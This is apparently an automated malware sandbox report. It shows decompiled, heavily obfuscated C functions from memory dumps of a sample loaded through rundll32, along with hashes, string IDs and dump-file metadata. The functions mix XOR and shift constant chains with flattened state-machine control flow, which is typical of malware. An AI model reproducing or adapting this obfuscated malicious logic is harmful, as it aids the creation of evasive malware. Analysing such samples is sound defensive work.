                                                                                                                                                            				 *(_t245 + 0x2c) = 0xa6821;
                                                                                                                                                            				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
                                                                                                                                                            				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
                                                                                                                                                            				 *(_t245 + 0x60) = 0x210575;
                                                                                                                                                            				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
                                                                                                                                                            				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
                                                                                                                                                            				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
                                                                                                                                                            				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
                                                                                                                                                            				 *(_t245 + 0x44) = 0xde4c18;
                                                                                                                                                            				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
                                                                                                                                                            				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
                                                                                                                                                            				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
                                                                                                                                                            				 *(_t245 + 0x50) = 0xde2575;
                                                                                                                                                            				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
                                                                                                                                                            				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
                                                                                                                                                            				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
                                                                                                                                                            				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
                                                                                                                                                            				 *(_t245 + 0x18) = 0x52bd7f;
                                                                                                                                                            				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
                                                                                                                                                            				 *(_t245 + 0x3c) = 0xe72c64;
                                                                                                                                                            				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
                                                                                                                                                            				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
                                                                                                                                                            				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
                                                                                                                                                            				 *(_t245 + 0x48) = 0x12926a;
                                                                                                                                                            				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
                                                                                                                                                            				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
                                                                                                                                                            				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
                                                                                                                                                            				 *(_t245 + 0x5c) = 0xf2f3b3;
                                                                                                                                                            				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
                                                                                                                                                            				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
                                                                                                                                                            				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
                                                                                                                                                            				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
                                                                                                                                                            				 *(_t245 + 0x64) = 0x250dfe;
                                                                                                                                                            				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
                                                                                                                                                            				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
                                                                                                                                                            				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
                                                                                                                                                            				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
                                                                                                                                                            				 *(_t245 + 0x68) = 0x1b0053;
                                                                                                                                                            				_t226 = 0x44;
                                                                                                                                                            				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
                                                                                                                                                            				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
                                                                                                                                                            				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
                                                                                                                                                            				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
                                                                                                                                                            				 *(_t245 + 0x30) = 0x848c63;
                                                                                                                                                            				_t142 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                                                            				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
                                                                                                                                                            				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
                                                                                                                                                            				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
                                                                                                                                                            				 *(_t245 + 0x28) = 0x69c662;
                                                                                                                                                            				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
                                                                                                                                                            				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
                                                                                                                                                            				 *(_t245 + 0x20) = 0x70b48b;
                                                                                                                                                            				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
                                                                                                                                                            				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
                                                                                                                                                            				 *(_t245 + 0x1c) = 0x80403c;
                                                                                                                                                            				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
                                                                                                                                                            				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
                                                                                                                                                            				_push( *(_t245 + 0x58));
                                                                                                                                                            				_push( *(_t245 + 0x40));
                                                                                                                                                            				_t236 = 0x1e;
                                                                                                                                                            				E00374B61(_t142, _t236);
                                                                                                                                                            				_t166 = _t245 - 0x220; // 0x12da7b13
                                                                                                                                                            				E00374B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
                                                                                                                                                            				_t169 = _t245 - 0x428; // 0x12da790b
                                                                                                                                                            				E00374B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
                                                                                                                                                            				_t171 = _t245 - 0x220; // 0x12da7b13
                                                                                                                                                            				E00373BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
                                                                                                                                                            				_t176 = _t245 - 0x428; // 0x12da790b
                                                                                                                                                            				E00373BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
                                                                                                                                                            				_t183 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                                                            				 *(_t245 - 0x14) =  *(_t245 + 0x38);
                                                                                                                                                            				_t185 = _t245 - 0x220; // 0x12da7b13
                                                                                                                                                            				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
                                                                                                                                                            				_t187 = _t245 - 0x428; // 0x12da790b
                                                                                                                                                            				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
                                                                                                                                                            				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
                                                                                                                                                            				_t222 = E00374DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                            				return  ~_t222 + 1;
                                                                                                                                                            			}










                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: !h$5M$d,
                                                                                                                                                            • API String ID: 0-3324333736
                                                                                                                                                            • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                                            • Instruction ID: f326043d7d5119d560eaf42f2a7e9d15beca523a495de0bf5d798bd7c065ff43
                                                                                                                                                            • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                                            • Instruction Fuzzy Hash: 2491CEB140038C9BCF59CF65C98A9DE3FB1BB04358F509219FD2A96260D3B5C999CF84
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E0038DEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                                                            				char _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				void* _t132;
                                                                                                                                                            				signed int _t152;
                                                                                                                                                            				signed int _t154;
                                                                                                                                                            				signed int _t155;
                                                                                                                                                            				void* _t158;
                                                                                                                                                            				signed int* _t175;
                                                                                                                                                            				void* _t177;
                                                                                                                                                            				void* _t178;
                                                                                                                                                            
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_t174 = _a12;
                                                                                                                                                            				_t175 = __ecx;
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t132);
                                                                                                                                                            				_v68 = 0x4bd93;
                                                                                                                                                            				_t178 = _t177 + 0x18;
                                                                                                                                                            				_v68 = _v68 << 0xc;
                                                                                                                                                            				_v68 = _v68 ^ 0x4bd93000;
                                                                                                                                                            				_t158 = 0xc7349d4;
                                                                                                                                                            				_v72 = 0xdd086a;
                                                                                                                                                            				_v72 = _v72 + 0xe602;
                                                                                                                                                            				_v72 = _v72 ^ 0x00de9932;
                                                                                                                                                            				_v80 = 0x3b4fac;
                                                                                                                                                            				_v80 = _v80 | 0x3fbbffff;
                                                                                                                                                            				_v80 = _v80 ^ 0x3fb1db7a;
                                                                                                                                                            				_v84 = 0xeaa49b;
                                                                                                                                                            				_v84 = _v84 | 0xeaf55708;
                                                                                                                                                            				_v84 = _v84 ^ 0x8a8b7318;
                                                                                                                                                            				_v84 = _v84 ^ 0x607b886d;
                                                                                                                                                            				_v88 = 0x47a;
                                                                                                                                                            				_v88 = _v88 << 0x10;
                                                                                                                                                            				_v88 = _v88 << 7;
                                                                                                                                                            				_v88 = _v88 ^ 0x3d0d9eb4;
                                                                                                                                                            				_v92 = 0xf1af5e;
                                                                                                                                                            				_v92 = _v92 >> 0xc;
                                                                                                                                                            				_t154 = 0x35;
                                                                                                                                                            				_v92 = _v92 * 0x55;
                                                                                                                                                            				_v92 = _v92 ^ 0x000492d7;
                                                                                                                                                            				_v104 = 0x9f0b47;
                                                                                                                                                            				_v104 = _v104 + 0xffffc934;
                                                                                                                                                            				_v104 = _v104 ^ 0x723421f7;
                                                                                                                                                            				_v104 = _v104 | 0x7192d654;
                                                                                                                                                            				_v104 = _v104 ^ 0x73b08a7e;
                                                                                                                                                            				_v100 = 0x1207d9;
                                                                                                                                                            				_v100 = _v100 + 0x7e1b;
                                                                                                                                                            				_v100 = _v100 | 0x7b677906;
                                                                                                                                                            				_v100 = _v100 * 0xf;
                                                                                                                                                            				_v100 = _v100 ^ 0x3c0b4b50;
                                                                                                                                                            				_v60 = 0x5b441e;
                                                                                                                                                            				_v60 = _v60 ^ 0x5c22d9cd;
                                                                                                                                                            				_v60 = _v60 ^ 0x5c7ef938;
                                                                                                                                                            				_v64 = 0xefe367;
                                                                                                                                                            				_v64 = _v64 + 0x4581;
                                                                                                                                                            				_v64 = _v64 ^ 0x00f6697a;
                                                                                                                                                            				_v76 = 0x71c375;
                                                                                                                                                            				_t155 = 0x14;
                                                                                                                                                            				_v76 = _v76 / _t154;
                                                                                                                                                            				_v76 = _v76 + 0xaf56;
                                                                                                                                                            				_v76 = _v76 ^ 0x000ba048;
                                                                                                                                                            				_v48 = 0x1a9f92;
                                                                                                                                                            				_v48 = _v48 + 0x9d50;
                                                                                                                                                            				_v48 = _v48 ^ 0x001d37d0;
                                                                                                                                                            				_v52 = 0xf5c688;
                                                                                                                                                            				_v52 = _v52 + 0xffff5f34;
                                                                                                                                                            				_v52 = _v52 ^ 0x00ffa10c;
                                                                                                                                                            				_v56 = 0x3cec64;
                                                                                                                                                            				_v56 = _v56 ^ 0x003949c0;
                                                                                                                                                            				_v96 = 0x7057ec;
                                                                                                                                                            				_v96 = _v96 * 0x35;
                                                                                                                                                            				_v96 = _v96 | 0xca3e56e5;
                                                                                                                                                            				_v96 = _v96 / _t155;
                                                                                                                                                            				_v96 = _v96 ^ 0x0b2d80e0;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t158 != 0x254c3a7) {
                                                                                                                                                            						if(_t158 == 0x324cad4) {
                                                                                                                                                            							E00380DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
                                                                                                                                                            							_t178 = _t178 + 0x10;
                                                                                                                                                            							_t158 = 0xd972b83;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t158 == 0xc7349d4) {
                                                                                                                                                            								_t158 = 0x254c3a7;
                                                                                                                                                            								 *_t175 =  *_t175 & 0x00000000;
                                                                                                                                                            								_t175[1] = _v68;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t158 == 0xd972b83) {
                                                                                                                                                            									E00390E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t158 == 0xecd5bc1) {
                                                                                                                                                            										_push(_t158);
                                                                                                                                                            										_push(_t158);
                                                                                                                                                            										_t152 = E00377FF2(_t175[1]);
                                                                                                                                                            										 *_t175 = _t152;
                                                                                                                                                            										__eflags = _t152;
                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                            											_t158 = 0xfbc7198;
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t158 != 0xfbc7198) {
                                                                                                                                                            											goto L13;
                                                                                                                                                            										} else {
                                                                                                                                                            											E00373DBC( &_v44, _t175, _v88, _v92, _v104);
                                                                                                                                                            											_t178 = _t178 + 0xc;
                                                                                                                                                            											_t158 = 0x324cad4;
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L16:
                                                                                                                                                            						__eflags =  *_t175;
                                                                                                                                                            						_t131 =  *_t175 != 0;
                                                                                                                                                            						__eflags = _t131;
                                                                                                                                                            						return 0 | _t131;
                                                                                                                                                            					}
                                                                                                                                                            					_t175[1] = E0038AC3A(_t174);
                                                                                                                                                            					_t158 = 0xecd5bc1;
                                                                                                                                                            					L13:
                                                                                                                                                            					__eflags = _t158 - 0x72dd7bf;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L16;
                                                                                                                                                            			}



























                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038e14b
                                                                                                                                                            0x0038e104
                                                                                                                                                            0x0038e106
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038e10c
                                                                                                                                                            0x0038e11e
                                                                                                                                                            0x0038e123
                                                                                                                                                            0x0038e126
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038e126
                                                                                                                                                            0x0038e106
                                                                                                                                                            0x0038e102
                                                                                                                                                            0x0038e0f6
                                                                                                                                                            0x0038e0ee
                                                                                                                                                            0x0038e1c5
                                                                                                                                                            0x0038e1c7
                                                                                                                                                            0x0038e1cc
                                                                                                                                                            0x0038e1cc
                                                                                                                                                            0x0038e1d3
                                                                                                                                                            0x0038e1d3
                                                                                                                                                            0x0038e18f
                                                                                                                                                            0x0038e192
                                                                                                                                                            0x0038e197
                                                                                                                                                            0x0038e197
                                                                                                                                                            0x0038e197
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: d<$g$Wp
                                                                                                                                                            • API String ID: 0-355099142
                                                                                                                                                            • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                                            • Instruction ID: bf0f6f14cccd061bba9ac59937ab9221d3572fa190dbb2e81748d5447c58c068
                                                                                                                                                            • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                                            • Instruction Fuzzy Hash: 277141B11093419FC769DF61C48982BBBF1FBC9748F10895DF29A96220D3B68A09CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                            			E00371A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				char _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				void* _t86;
                                                                                                                                                            				void* _t100;
                                                                                                                                                            				void* _t101;
                                                                                                                                                            				void* _t103;
                                                                                                                                                            				void* _t115;
                                                                                                                                                            				void* _t116;
                                                                                                                                                            				signed int _t117;
                                                                                                                                                            				void* _t119;
                                                                                                                                                            				void* _t120;
                                                                                                                                                            
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_t115 = __edx;
                                                                                                                                                            				_t101 = __ecx;
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t86);
                                                                                                                                                            				_v72 = 0xccde8a;
                                                                                                                                                            				_t120 = _t119 + 0x10;
                                                                                                                                                            				_v72 = _v72 | 0xfb673ead;
                                                                                                                                                            				_v72 = _v72 + 0xedb6;
                                                                                                                                                            				_t116 = 0;
                                                                                                                                                            				_v72 = _v72 + 0xffff76c0;
                                                                                                                                                            				_t103 = 0x3303944;
                                                                                                                                                            				_v72 = _v72 ^ 0xfbf43e98;
                                                                                                                                                            				_v48 = 0xd56f6c;
                                                                                                                                                            				_v48 = _v48 ^ 0x96c3cc23;
                                                                                                                                                            				_v48 = _v48 ^ 0x96174539;
                                                                                                                                                            				_v76 = 0xdcf6fd;
                                                                                                                                                            				_v76 = _v76 + 0xffffee01;
                                                                                                                                                            				_t117 = 0x65;
                                                                                                                                                            				_v76 = _v76 * 0x23;
                                                                                                                                                            				_v76 = _v76 + 0xffff4e11;
                                                                                                                                                            				_v76 = _v76 ^ 0x1e3c7761;
                                                                                                                                                            				_v80 = 0x144f78;
                                                                                                                                                            				_v80 = _v80 * 0x39;
                                                                                                                                                            				_v80 = _v80 ^ 0xe273dc44;
                                                                                                                                                            				_v80 = _v80 >> 5;
                                                                                                                                                            				_v80 = _v80 ^ 0x073b5be1;
                                                                                                                                                            				_v52 = 0xb4a3bb;
                                                                                                                                                            				_v52 = _v52 ^ 0x916b14c7;
                                                                                                                                                            				_v52 = _v52 ^ 0x91dd676b;
                                                                                                                                                            				_v68 = 0x8d73f0;
                                                                                                                                                            				_v68 = _v68 >> 0xe;
                                                                                                                                                            				_v68 = _v68 * 0x1c;
                                                                                                                                                            				_v68 = _v68 ^ 0x0000c864;
                                                                                                                                                            				_v56 = 0xe6cb06;
                                                                                                                                                            				_v56 = _v56 >> 4;
                                                                                                                                                            				_v56 = _v56 | 0x1af2f565;
                                                                                                                                                            				_v56 = _v56 ^ 0x1af384df;
                                                                                                                                                            				_v60 = 0x4f2325;
                                                                                                                                                            				_t55 =  &_v60; // 0x4f2325
                                                                                                                                                            				_v60 =  *_t55 * 0x78;
                                                                                                                                                            				_t57 =  &_v60; // 0x4f2325
                                                                                                                                                            				_v60 =  *_t57 / _t117;
                                                                                                                                                            				_v60 = _v60 ^ 0x0059a097;
                                                                                                                                                            				_v64 = 0xa290a2;
                                                                                                                                                            				_v64 = _v64 >> 4;
                                                                                                                                                            				_v64 = _v64 + 0x6f89;
                                                                                                                                                            				_v64 = _v64 ^ 0x00044b6b;
                                                                                                                                                            				while(_t103 != 0x3303944) {
                                                                                                                                                            					if(_t103 == 0x5a97fa2) {
                                                                                                                                                            						__eflags = E0038D97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
                                                                                                                                                            						_t116 =  !=  ? 1 : _t116;
                                                                                                                                                            					} else {
                                                                                                                                                            						if(_t103 == 0xa5a4144) {
                                                                                                                                                            							E00373DBC( &_v44, _t101, _v72, _v48, _v76);
                                                                                                                                                            							_t120 = _t120 + 0xc;
                                                                                                                                                            							_t103 = 0xf0cd209;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t103 != 0xf0cd209) {
                                                                                                                                                            								L9:
                                                                                                                                                            								__eflags = _t103 - 0x1b06c67;
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t100 = E00372A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
                                                                                                                                                            								_t120 = _t120 + 0xc;
                                                                                                                                                            								if(_t100 != 0) {
                                                                                                                                                            									_t103 = 0x5a97fa2;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					return _t116;
                                                                                                                                                            				}
                                                                                                                                                            				_t103 = 0xa5a4144;
                                                                                                                                                            				goto L9;
                                                                                                                                                            			}






















                                                                                                                                                            0x00371b16
                                                                                                                                                            0x00371b1e
                                                                                                                                                            0x00371b26
                                                                                                                                                            0x00371b2e
                                                                                                                                                            0x00371b38
                                                                                                                                                            0x00371b3c
                                                                                                                                                            0x00371b44
                                                                                                                                                            0x00371b4c
                                                                                                                                                            0x00371b51
                                                                                                                                                            0x00371b59
                                                                                                                                                            0x00371b61
                                                                                                                                                            0x00371b69
                                                                                                                                                            0x00371b6e
                                                                                                                                                            0x00371b72
                                                                                                                                                            0x00371b7d
                                                                                                                                                            0x00371b81
                                                                                                                                                            0x00371b89
                                                                                                                                                            0x00371b91
                                                                                                                                                            0x00371b96
                                                                                                                                                            0x00371b9e
                                                                                                                                                            0x00371ba6
                                                                                                                                                            0x00371bb0
                                                                                                                                                            0x00371c36
                                                                                                                                                            0x00371c38
                                                                                                                                                            0x00371bb2
                                                                                                                                                            0x00371bb8
                                                                                                                                                            0x00371bf9
                                                                                                                                                            0x00371bfe
                                                                                                                                                            0x00371c01
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00371bba
                                                                                                                                                            0x00371bc0
                                                                                                                                                            0x00371c0d
                                                                                                                                                            0x00371c0d
                                                                                                                                                            0x00371c13
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00371c15
                                                                                                                                                            0x00371bc2
                                                                                                                                                            0x00371bd7
                                                                                                                                                            0x00371bdc
                                                                                                                                                            0x00371be1
                                                                                                                                                            0x00371be3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00371be3
                                                                                                                                                            0x00371be1
                                                                                                                                                            0x00371bc0
                                                                                                                                                            0x00371bb8
                                                                                                                                                            0x00371c44
                                                                                                                                                            0x00371c44
                                                                                                                                                            0x00371c08
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %#O$DAZ$DAZ
                                                                                                                                                            • API String ID: 0-2081751441
                                                                                                                                                            • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                                            • Instruction ID: 765077a1515b393464920d312dcecc0e12a032b51ac99d514138d642179c89ad
                                                                                                                                                            • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                                            • Instruction Fuzzy Hash: D45167725083069FC76ACF25D98681FBBE1FBD8708F504A1DF58A96220D375CA098F87
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00390C14(void* __ecx) {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				void* _t111;
                                                                                                                                                            				void* _t115;
                                                                                                                                                            				void* _t116;
                                                                                                                                                            				signed int _t118;
                                                                                                                                                            				void* _t124;
                                                                                                                                                            				void* _t125;
                                                                                                                                                            				signed int* _t127;
                                                                                                                                                            
                                                                                                                                                            				_t127 =  &_v44;
                                                                                                                                                            				_t116 = __ecx;
                                                                                                                                                            				_v24 = 0x2b1199;
                                                                                                                                                            				_v24 = _v24 + 0x4ba2;
                                                                                                                                                            				_v24 = _v24 << 0xa;
                                                                                                                                                            				_v24 = _v24 ^ 0xad737bf1;
                                                                                                                                                            				_v44 = 0xc9a4fe;
                                                                                                                                                            				_v44 = _v44 << 0xe;
                                                                                                                                                            				_v44 = _v44 | 0xe69540e1;
                                                                                                                                                            				_v44 = _v44 + 0xffffff88;
                                                                                                                                                            				_v44 = _v44 ^ 0xefbb2da7;
                                                                                                                                                            				_v28 = 0xedc73;
                                                                                                                                                            				_v28 = _v28 + 0xffff2701;
                                                                                                                                                            				_v28 = _v28 + 0x8bbf;
                                                                                                                                                            				_v28 = _v28 ^ 0x00055e2c;
                                                                                                                                                            				_v16 = 0xf95115;
                                                                                                                                                            				_v16 = _v16 | 0x79ce56df;
                                                                                                                                                            				_v16 = _v16 + 0xffff5817;
                                                                                                                                                            				_v16 = _v16 ^ 0x79f40a5c;
                                                                                                                                                            				_v36 = 0x520750;
                                                                                                                                                            				_v36 = _v36 << 7;
                                                                                                                                                            				_v36 = _v36 ^ 0x4f263ebd;
                                                                                                                                                            				_v36 = _v36 * 6;
                                                                                                                                                            				_v36 = _v36 ^ 0x64ef8369;
                                                                                                                                                            				_t124 = 0;
                                                                                                                                                            				_v40 = 0xccfebc;
                                                                                                                                                            				_t125 = 0x2aa38ff;
                                                                                                                                                            				_v40 = _v40 + 0xbaf7;
                                                                                                                                                            				_t118 = 0xd;
                                                                                                                                                            				_v40 = _v40 * 0x5e;
                                                                                                                                                            				_v40 = _v40 + 0x6a66;
                                                                                                                                                            				_v40 = _v40 ^ 0x4b80704d;
                                                                                                                                                            				_v20 = 0xba2b89;
                                                                                                                                                            				_v20 = _v20 + 0xa093;
                                                                                                                                                            				_v20 = _v20 / _t118;
                                                                                                                                                            				_v20 = _v20 ^ 0x000a03fd;
                                                                                                                                                            				_v32 = 0xb0f3b0;
                                                                                                                                                            				_v32 = _v32 + 0x50dc;
                                                                                                                                                            				_v32 = _v32 + 0xffff1629;
                                                                                                                                                            				_v32 = _v32 * 0x4e;
                                                                                                                                                            				_v32 = _v32 ^ 0x35b73aee;
                                                                                                                                                            				_v4 = 0x432383;
                                                                                                                                                            				_v4 = _v4 + 0xffff373f;
                                                                                                                                                            				_v4 = _v4 | 0x7532efd9;
                                                                                                                                                            				_v4 = _v4 ^ 0x75785e39;
                                                                                                                                                            				_v8 = 0x709bec;
                                                                                                                                                            				_v8 = _v8 + 0xffffb2bc;
                                                                                                                                                            				_v8 = _v8 + 0xffff08e7;
                                                                                                                                                            				_v8 = _v8 ^ 0x006dec69;
                                                                                                                                                            				_v12 = 0xe79dac;
                                                                                                                                                            				_v12 = _v12 * 0x78;
